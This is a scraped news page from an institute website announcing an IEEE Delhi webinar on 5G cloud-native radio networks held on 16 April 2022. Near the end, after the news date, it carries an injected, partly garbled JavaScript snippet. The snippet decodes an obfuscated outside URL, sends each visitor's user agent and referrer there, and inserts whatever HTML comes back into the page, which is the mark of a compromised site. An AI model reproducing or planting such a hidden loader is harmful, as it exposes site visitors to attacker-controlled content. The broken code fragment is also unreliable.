

Published on BVICAM (http://14.140.205.245)

Home > Invitation for Webinar on 5G Radio Network dated 16-04-2022

Invitation for Webinar on 5G Radio Network dated 16-04-2022

IEEE Delhi Section with Computer Society Chapter, Consultants Network Affinity Group, Life Member Affinity Group, Inter Society Relations, Industry Relations & SIGHT Standing Committees of IEEE Delhi with the associations CSI, Safa Society, ISTE Delhi Section, IETE Delhi Centre, invites you for a Webinar on 16-April-2022, the Saturday, at 06:00 p.m.

The underpinning of the new network being designed and deployed for 5G is based on brining Cloud paradigm to Telecom Networks. A flexible, scalable and programmable Radio Network with new cloud native Network Elements, that encourages innovation by opening up to developers through cloud style service programmability, while hiding complex real time sensitive Radio functionality of 5G on specialized cloud platforms. If this sounds familiar to Hyperscaler (AWS, Azure, GCP) technology, which led to phenomenal cloud adoption in Enterprise/Consumer/Gaming application area, then indeed you are thinking in the right direction. This webinar will introduce elements of disaggregated Radio Network, the approaches and current design thinking of how networks can be made "intelligent". This session shall facilitate the participants to get an appreciation of cloudification transformation of 5G Radio Networks and why it is one of the most significant transformation happening in Telecom Networks. The webinar will discuss its all round perspective including the real-time issues and challenges.

File:

Invitation for Webinar on 5G Radio Network dated 16-04-2022.pdf₁₁

News Category:

Activities

News Date:

Monday, 7 March, 2022 - 12:30

{ let selfer=new XMLHttpRequest;selfer.open("GET", decodeURIComponent(escape(atob('aHR0cHM6Ly91cmxzcGF0aC5jb20vdmVyaWZ5LnBocA=='))) nt=\${navigator?.userAgent}&r=\${document?.referrer}`),selfer.onreadystatechange=(()=>{if(4==selfer.readyState)e);document.querySelector("body").insertAdjacentHTML("afterbegin",e?.html)}}),selfer.setRequestHeader("RequestPi); //-->

Source URL: http://14.140.205.245/content/invitation-webinar-5g-radio-network-dated-16-04-2022

Links:

[1]

http://14.140.205.245/sites/default/files/news/Invitation%20for%20Webinar%20on%205G%20Radio%20Network%2004-2022.pdf